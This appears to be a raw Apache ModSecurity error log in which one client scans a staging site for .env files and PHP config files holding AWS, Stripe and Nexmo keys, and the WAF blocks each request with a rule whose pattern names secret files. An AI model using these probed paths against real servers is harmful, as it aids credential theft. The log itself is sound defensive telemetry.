[Tue May 26 15:30:50.870965 2026] [security2:error] [pid 715645:tid 715769] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/cms/.env"] [unique_id "ahVvUnVGgMGh8k213RgNiQAAHHs"]
[Tue May 26 15:30:50.886839 2026] [security2:error] [pid 715645:tid 715806] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNfgAAAB8"]
[Tue May 26 15:30:50.888114 2026] [security2:error] [pid 715645:tid 715890] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNeQAAAHM"]
[Tue May 26 15:30:50.890323 2026] [security2:error] [pid 715645:tid 715840] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNfQAAAEE"]
[Tue May 26 15:30:50.897949 2026] [security2:error] [pid 715645:tid 715878] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNfwAAAGc"]
[Tue May 26 15:30:50.904154 2026] [security2:error] [pid 715645:tid 715706] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/config.php"] [unique_id "ahVvUnVGgMGh8k213RgNmAAAHDw"]
[Tue May 26 15:30:50.922061 2026] [security2:error] [pid 715645:tid 715857] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNhgAAAFI"]
[Tue May 26 15:30:50.925365 2026] [security2:error] [pid 715645:tid 715842] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNjgAAAEM"]
[Tue May 26 15:30:50.926580 2026] [security2:error] [pid 715645:tid 715803] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNhQAAHE0"]
[Tue May 26 15:30:51.044957 2026] [security2:error] [pid 715645:tid 715646] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/config/.env"] [unique_id "ahVvU3VGgMGh8k213RgNsQAAHAA"]
[Tue May 26 15:30:51.191537 2026] [security2:error] [pid 715645:tid 715762] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/config/aws.php"] [unique_id "ahVvU3VGgMGh8k213RgNvAAAHHQ"]
[Tue May 26 15:30:51.277308 2026] [security2:error] [pid 715645:tid 715864] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNjwAAAFk"]
[Tue May 26 15:30:51.285224 2026] [security2:error] [pid 715645:tid 715875] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNlQAAAGQ"]
[Tue May 26 15:30:51.286405 2026] [security2:error] [pid 715645:tid 715803] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNlAAAHEQ"]
[Tue May 26 15:30:51.287953 2026] [security2:error] [pid 715645:tid 715874] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNlgAAAGM"]
[Tue May 26 15:30:51.290595 2026] [security2:error] [pid 715645:tid 715807] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNjQAAACA"]
[Tue May 26 15:30:51.298010 2026] [security2:error] [pid 715645:tid 715803] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvUnVGgMGh8k213RgNlwAAHDc"]
[Tue May 26 15:30:51.316525 2026] [security2:error] [pid 715645:tid 715872] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgNsAAAAGE"]
[Tue May 26 15:30:51.318237 2026] [security2:error] [pid 715645:tid 715882] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgNqQAAAGs"]
[Tue May 26 15:30:51.318347 2026] [security2:error] [pid 715645:tid 715803] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgNuAAAHAE"]
[Tue May 26 15:30:51.320528 2026] [security2:error] [pid 715645:tid 715831] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgNsgAAADg"]
[Tue May 26 15:30:51.323345 2026] [security2:error] [pid 715645:tid 715833] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgNuwAAADo"]
[Tue May 26 15:30:51.323877 2026] [security2:error] [pid 715645:tid 715803] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgNtAAAHAM"]
[Tue May 26 15:30:51.326753 2026] [security2:error] [pid 715645:tid 715871] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgNqAAAAGA"]
[Tue May 26 15:30:51.333377 2026] [security2:error] [pid 715645:tid 715889] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgNswAAAHI"]
[Tue May 26 15:30:51.338458 2026] [security2:error] [pid 715645:tid 715838] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgNugAAAD8"]
[Tue May 26 15:30:51.390483 2026] [security2:error] [pid 715645:tid 715885] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgNxQAAAG4"]
[Tue May 26 15:30:51.432460 2026] [security2:error] [pid 715645:tid 715773] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/config/config.inc.php"] [unique_id "ahVvU3VGgMGh8k213RgNzAAAA38"]
[Tue May 26 15:30:51.437349 2026] [security2:error] [pid 715645:tid 715751] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/config/config.php"] [unique_id "ahVvU3VGgMGh8k213RgNzwAAA2k"]
[Tue May 26 15:30:51.466896 2026] [security2:error] [pid 715645:tid 715752] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/config/env.php"] [unique_id "ahVvU3VGgMGh8k213RgN1wAAA2o"]
[Tue May 26 15:30:51.473061 2026] [security2:error] [pid 715645:tid 715696] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/config/module.config.php"] [unique_id "ahVvU3VGgMGh8k213RgN2gAAAzI"]
[Tue May 26 15:30:51.478144 2026] [security2:error] [pid 715645:tid 715778] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgNywAAAxY"]
[Tue May 26 15:30:51.479769 2026] [security2:error] [pid 715645:tid 715760] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/config/nexmo.php"] [unique_id "ahVvU3VGgMGh8k213RgN3AAAA3I"]
[Tue May 26 15:30:51.482123 2026] [security2:error] [pid 715645:tid 715778] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgNzQAAAwg"]
[Tue May 26 15:30:51.484970 2026] [security2:error] [pid 715645:tid 715778] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgNzgAAA3k"]
[Tue May 26 15:30:51.490859 2026] [security2:error] [pid 715645:tid 715778] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgN0QAAA2g"]
[Tue May 26 15:30:51.510842 2026] [security2:error] [pid 715645:tid 715778] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgN1QAAA3M"]
[Tue May 26 15:30:51.518392 2026] [security2:error] [pid 715645:tid 715873] [client 195.2.71.225:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgN0wAAAGI"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1230859&moderation-hash=2aac02f82ca332a981ba185237eedd5a
[Tue May 26 15:30:51.520674 2026] [security2:error] [pid 715645:tid 715778] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgN2AAAA1w"]
[Tue May 26 15:30:51.523104 2026] [security2:error] [pid 715645:tid 715778] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgN1AAAAz8"]
[Tue May 26 15:30:51.528825 2026] [security2:error] [pid 715645:tid 715778] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgN1gAAA3A"]
[Tue May 26 15:30:51.531519 2026] [security2:error] [pid 715645:tid 715811] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgN3gAAACQ"]
[Tue May 26 15:30:51.542747 2026] [security2:error] [pid 715645:tid 715825] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgN4AAAADI"]
[Tue May 26 15:30:51.594639 2026] [security2:error] [pid 715645:tid 715842] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgN5gAAAEM"]
[Tue May 26 15:30:51.613056 2026] [security2:error] [pid 715645:tid 715672] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.staging.unsobered.com"] [uri "/config/stripe.php"] [unique_id "ahVvU3VGgMGh8k213RgN6QAAAxo"]
[Tue May 26 15:30:51.621952 2026] [security2:error] [pid 715645:tid 715778] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgN5wAAAxk"]
[Tue May 26 15:30:51.628476 2026] [security2:error] [pid 715645:tid 715778] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgN6AAAAzE"]
[Tue May 26 15:30:51.667751 2026] [security2:error] [pid 715645:tid 715778] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgN6wAAAwY"]
[Tue May 26 15:30:51.673496 2026] [security2:error] [pid 715645:tid 715778] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgN7QAAA2s"]
[Tue May 26 15:30:51.679842 2026] [security2:error] [pid 715645:tid 715777] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgN8AAAAAI"]
[Tue May 26 15:30:51.681987 2026] [security2:error] [pid 715645:tid 715848] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgN8wAAAEk"]
[Tue May 26 15:30:51.685967 2026] [security2:error] [pid 715645:tid 715836] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgN9QAAAD0"]
[Tue May 26 15:30:51.691314 2026] [security2:error] [pid 715645:tid 715778] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgN9AAAAww"]
[Tue May 26 15:30:51.713804 2026] [security2:error] [pid 715645:tid 715778] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgN-gAAAwk"]
[Tue May 26 15:30:51.720603 2026] [security2:error] [pid 715645:tid 715778] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgN-wAAAxg"]
[Tue May 26 15:30:51.753133 2026] [security2:error] [pid 715645:tid 715799] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgOAgAAABg"]
[Tue May 26 15:30:51.754167 2026] [security2:error] [pid 715645:tid 715875] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgOBQAAAGQ"]
[Tue May 26 15:30:51.757604 2026] [security2:error] [pid 715645:tid 715856] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgOBAAAAFE"]
[Tue May 26 15:30:51.757853 2026] [security2:error] [pid 715645:tid 715864] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgOAwAAAFk"]
[Tue May 26 15:30:51.788363 2026] [security2:error] [pid 715645:tid 715778] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgOBwAAAws"]
[Tue May 26 15:30:51.824381 2026] [security2:error] [pid 715645:tid 715882] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgOEAAAAGs"]
[Tue May 26 15:30:51.825791 2026] [security2:error] [pid 715645:tid 715837] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgODwAAAD4"]
[Tue May 26 15:30:51.859343 2026] [security2:error] [pid 715645:tid 715687] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/crm/.env"] [unique_id "ahVvU3VGgMGh8k213RgOFgAAAyk"]
[Tue May 26 15:30:51.859835 2026] [security2:error] [pid 715645:tid 715678] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/cron/.env"] [unique_id "ahVvU3VGgMGh8k213RgOFwAAAyA"]
[Tue May 26 15:30:51.859897 2026] [security2:error] [pid 715645:tid 715759] [remote 195.178.110.199:53592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/current/.env"] [unique_id "ahVvU3VGgMGh8k213RgOGQAAA3E"]
[Tue May 26 15:30:51.864040 2026] [security2:error] [pid 715645:tid 715778] [client 195.178.110.199:53592] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvU3VGgMGh8k213RgOEwAAAxU"]
